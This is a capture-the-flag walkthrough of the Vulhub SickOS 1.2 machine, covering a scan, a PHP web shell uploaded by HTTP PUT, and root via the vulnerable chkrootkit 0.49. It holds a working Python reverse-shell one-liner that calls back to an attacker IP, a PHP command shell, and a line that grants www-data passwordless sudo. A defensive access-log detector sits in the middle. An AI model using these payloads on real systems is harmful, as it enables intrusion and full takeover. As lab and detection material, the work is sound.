sickos1.2

From Vulhub

Tools:

  • netdiscover
  • Nmap
  • Nikto
  • Wfuzz
  • Curl

Use netdiscover to detect target IP address

netdiscover -i eth0 -r 192.168.79.0/24

192.168.79.180 is the target.

Then run nmap to detect open ports and running services on the target machine.

nmap -sV -v -O -A -T5 192.168.79.180 -p-

Looks like port 22 and port 80 are open.

Check http://192.168.79.180

Nothing exciting.

Use Nikto:

Still nothing cool

Try wfuzz:

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 http://192.168.79.180/FUZZ 2>/dev/null

Find a test dir:

Next, examine the HTTP options:

curl -v -X OPTIONS http://192.168.79.180/test/

Looks like it supports PUT.

Now upload a PHP reverse shell (I tried different ports; looks like only port 443 works):

nmap -p80 192.168.79.180 --script http-put --script-args http-put.url='/test/shell.php',http-put.file='shell.php'

Now the shell is uploaded:

Get the reverse shell:

A better PHP shell:

<?php system($_GET["exec"]); ?>

Upload this shell, and in the browser:

http://192.168.79.180/test/exec.php?exec=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.79.173",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Get the shell.
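
On the defender's side, both the PUT upload and the later request to the uploaded script land in the web server access log. The following is an added example, not part of the original write-up: it flags that sequence in access log lines. It assumes Apache-style common/combined log format; the function name, the extension list and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: Apache-style common/combined access log format.
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
SCRIPT_EXT = (".php", ".phtml", ".php5")  # treated as server-executable (assumption)

# Constructed sample lines modelled on the requests in this write-up.
SAMPLE = [
    '192.168.79.173 - - [01/Jan/2020:10:00:01 +0000] "OPTIONS /test/ HTTP/1.1" 200 0',
    '192.168.79.50 - - [01/Jan/2020:10:00:03 +0000] "PUT /upload/a.php HTTP/1.1" 403 0',
    '192.168.79.173 - - [01/Jan/2020:10:00:05 +0000] "PUT /test/notes.txt HTTP/1.1" 201 0',
    '192.168.79.173 - - [01/Jan/2020:10:00:07 +0000] "PUT /test/exec.php HTTP/1.1" 201 0',
    '192.168.79.50 - - [01/Jan/2020:10:00:08 +0000] "GET /index.php HTTP/1.1" 200 163',
    '192.168.79.173 - - [01/Jan/2020:10:00:09 +0000] "GET /test/exec.php?exec=id HTTP/1.1" 200 54',
]

def find_put_then_exec(lines):
    """Flag script files created via HTTP PUT, and later requests that run them."""
    uploaded = set()   # script paths that a PUT successfully created
    alerts = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        path = urlsplit(m["target"]).path
        status = int(m["status"])
        if m["method"] == "PUT":
            # A 2xx answer to PUT means the server stored the body at that path.
            if 200 <= status < 300 and path.lower().endswith(SCRIPT_EXT):
                uploaded.add(path)
                alerts.append(("upload", m["ip"], path))
        elif path in uploaded and status < 400:
            # Any successful request to a PUT-created script means it was executed.
            alerts.append(("executed", m["ip"], path))
    return alerts

if __name__ == "__main__":
    for alert in find_put_then_exec(SAMPLE):
        print(alert)
```

Disabling PUT on the /test/ directory, or serving that directory without PHP handling, removes the condition this check looks for.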

During the enumeration step, I follow g0tmi1k

ls -l /etc/cron.daily

After enumeration, find that the system has chkrootkit:

dpkg -l | grep chkrootkit

The chkrootkit version is 0.49 and it is vulnerable.

searchsploit chkrootkit

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

Also need to change the privileges on the update file with chmod 777 and wait:

ls -al /etc/sudoers

Try:

sudo su

DONE